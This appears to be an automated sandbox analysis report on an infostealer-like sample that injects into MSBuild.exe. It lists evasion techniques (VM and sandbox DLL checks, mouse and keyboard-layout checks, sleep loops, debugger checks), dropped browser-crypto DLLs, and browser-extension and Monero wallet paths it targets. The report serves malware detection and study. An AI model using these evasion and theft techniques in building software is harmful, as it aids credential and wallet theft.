Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418A63 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418A63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 1.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7032, type: MEMORYSTR
Country aware sample found (crashes after keyboard check)
Source: c:\users\user\desktop\file.exe Event Logs and Signature results: Application crash and keyboard check
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: file.exe, MSBuild.exe Binary or memory string: DIR_WATCH.DLL
Source: file.exe, MSBuild.exe Binary or memory string: SBIEDLL.DLL
Source: file.exe, MSBuild.exe Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 1_2_0040180D
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 1.5 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 9.8 %
Source: C:\ProgramData\GCGHCBKFCF.exe API coverage: 1.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6644 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 6256 Thread sleep count: 87 > 30 Jump to behavior
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh 1_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005C73FF FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_005C73FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 1_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 1_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 1_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0040CD37
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003173FF FindFirstFileExW,FindNextFileW,FindClose,FindClose, 8_2_003173FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 1_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410FBA GetSystemInfo,wsprintfA, 1_2_00410FBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: Amcache.hve.4.dr Binary or memory string: VMware
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001565000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B82000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8e
Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001508000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001565000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWK
Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Process queried: DebugPort Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
